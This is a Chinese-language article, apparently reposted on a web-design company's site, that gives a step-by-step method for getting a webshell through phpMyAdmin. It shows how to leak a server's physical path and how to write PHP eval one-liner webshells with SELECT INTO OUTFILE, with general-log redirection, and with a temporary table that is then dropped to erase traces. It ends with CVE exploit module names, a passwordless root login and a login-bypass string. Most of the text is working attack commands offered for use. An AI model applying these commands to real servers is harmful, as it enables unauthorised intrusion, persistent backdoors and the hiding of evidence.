网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

web安全团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > web安全 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

GetShell思路之phpMyadmin:基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。

文章来源:重庆网络安全 发布时间:2020-02-10 14:17:10 围观次数:
分享到:

摘要:基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。本部分主要收集网站的物理路径,否则将无法通过URL连接Shell。

 基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。本部分主要收集网站的物理路径,否则将无法通过URL连接Shell。

物理路径


  查询数据库存储路径以推断网站的物理路径,也可以通过log变量获得


 select @@datadir;

blob.png

配置文件爆路径:如果注入点具有文件读取权限,则可以尝试通过load_file读取配置文件

# Windows c:\windows\php.ini                             # php配置文件 c:\windows\system32\inetsrv\MetaBase.xml       # IIS虚拟主机配置文件  # Linux /etc/php.ini                                   # php配置文件 /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf                     # Apache配置文件 /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/extra/httpd-vhosts.conf # 虚拟目录配置文件

单引号路径:直接在URL后添加单引号。 要求不对单引号进行过滤(gpc = off),并且服务器默认返回错误消息。

  www.abc.com/index.php?id=1‘

  错误的参数值爆路径:尝试将要提交的参数值更改为不正确的值。

  www.abc.com/index.php?id=-1

  Nginx文件类型错误解析爆路径:Web服务器必须为Nginx,并且存在文件类型解析漏洞。 在图像地址后添加/x.php,该图像不仅将作为php文件执行,而且还会显示物理路径。

  www.abc.com/bg.jpg/x.php

  Google爆路径

 site:xxx.com warning

 site:xxx.com “fatal error”

  测试文件爆路径

 www.xxx.com/test.php

 www.xxx.com/ceshi.php

 www.xxx.com/info.php

 www.xxx.com/phpinfo.php

 www.xxx.com/php_info.php

 www.xxx.com/1.php

  其他

 phpMyAdmin/libraries/selectlang.lib.php 

 phpMyAdmin/darkblueorange/layout.inc.php

 phpmyadmin/themes/darkblue_orange/layout.inc.php

 phpMyAdmin/index.php?lang[]=1

 phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1

 /phpmyadmin/libraries/lect_lang.lib.php

  /phpMyAdmin/phpinfo.php

 /phpmyadmin/themes/darkblue_orange/layout.inc.php

 /phpmyadmin/libraries/select_lang.lib.php

 /phpmyadmin/libraries/mcrypt.lib.php

其他资讯


  phpMyadmin后台面板可以直接查看MySQL版本,当前用户,操作系统,PHP版本,phpMyadmin版本和其他信息


  您还可以通过SQL查询获取其他信息


 select version();  -- 查看数据库版本

 select @@datadir;  -- 查看数据库存储路径

 show VARIABLES like '%char%';  -- 查看系统变量


GetShell


  先决条件


  网站的真实路径。 如果您不知道网站的真实路径,则无法通过URL连接到Shell。


  读写权限。 查询secure_file_priv参数以查看其是否具有读取和写入文件权限。 如果为NULL,则无法写入Shell。 该值是只读的,只能通过配置文件进行修改。 更改后,必须重新启动服务才能生效。

 select @@secure_file_priv   -- 查询secure_file_priv

 -- secure_file_priv=NULL,禁止导入导出

 -- secure_file_priv='',不限制导入导出

 -- secure_file_priv=/path/,只能向指定目录导入导出

  select load_file('c:/phpinfo.php');        -- 读取文件

 select '123' into outfile 'c:/shell.php';  -- 写入文件

  通用GetShell


  通过SQL查询直接写入Shell

 -假设物理路径为“ G:\ phpStudy \ WWW”

 select '<?php eval($_POST["pwd"]);?>' into outfile 'G:/phpStudy/WWW/shell.php';

  日志GetShell


  MySQL 5.0及更高版本将创建一个日志文件。 通过修改日志的全局变量并指定日志保存路径来打开日志。 然后通过查询写一个句子木马。 这时,将记录该木马并生成一个日志文件,从而生成GetShell。 但是前提是必须具有对生成的日志文件的读写权限。

  查询日志全局变量


  show variables like '%general%';

  Variable_name     Value

 general_log       OFF

 general_log_file  G:\phpStudy\MySQL\data\FengSec.log

general_log:日志保存状态

general_log_file:日志保存路径


  启用日志保存并配置保存路径


  set global general_log = "ON";    -- 打开日志保存

 set global general_log_file = "G:/phpstudy/WWW/log.php";  -- 设置日志保存路径,需先得知网站物理路径,否则即使写入了Shell也无法通过URL连接


写shell

 select '<?php eval($_POST[pwd]); ?>';

新表GetShell


  输入数据库并创建一个新的数据表。


  名称是任意的,这里是shell_table


  字段数填1

blob.png

添加字段


  字段名称是任意的,这里是xiaoma


  字段类型为TEXT

blob.png

单击表中的“插入”,值为一句话木马

<?php eval($_POST[pwd]); ?>'

blob.png

执行SQL查询以将此表的内容导出到指定文件


 -- 假设物理路径为 "G:\phpStudy\WWW"

 select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";

blob.png

删除表格并删除痕迹


 Drop TABLE IF EXISTS shell_table;

  以上步骤也可以通过MySQL语句执行


  Create TABLE shell_table (xiaoma text NOT NULL) -- 建表

 Insert INTO shell_table (xiaoma) VALUES('<?php eval($_POST[1]);?>');  -- 写入

 select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php';   -- 导出

 Drop TABLE IF EXISTS shell_table;    -- 删表

  特殊版本GetShell


  CVE-2013-3238


  受影响的版本:3.5.x <3.5.8.1和4.0.0 <4.0.0-rc3 ANYUN.ORG


  漏洞利用模块:exploit/multi/http/phpmyadminpregreplace

  CVE-2012-5159


  受影响的版本:phpMyAdmin v3.5.2.2


  漏洞利用模块:exploit/multi/http/phpmyadmin3522_backdoor

  CVE-2009-1151


  phpMyAdmin配置文件/config/config.inc.php存在命令执行


  受影响的版本:2.11.x <2.11.9.5和3.x <3.1.3.1


  漏洞利用模块:exploit/unix/webapp/phpmyadmin_config


万能密码&弱口令


  弱口令:版本phpmyadmin2.11.9.2,直接root用户登录,不需要密码


  万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@”则登录成功


本文由 重庆网络安全 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:GetShell思路 phpMyadmin MySQL数据库管理工具 Web界面管理数据库 重庆网络安全

上一篇:开源安全模块modsecurity测试攻击有效载荷加密,WebShell流量检测的WAF性能分析
下一篇:减少企业遭受Windows设备网络上的凭据转储攻击漏洞的五个技巧

热门资讯

鼠标向下滚动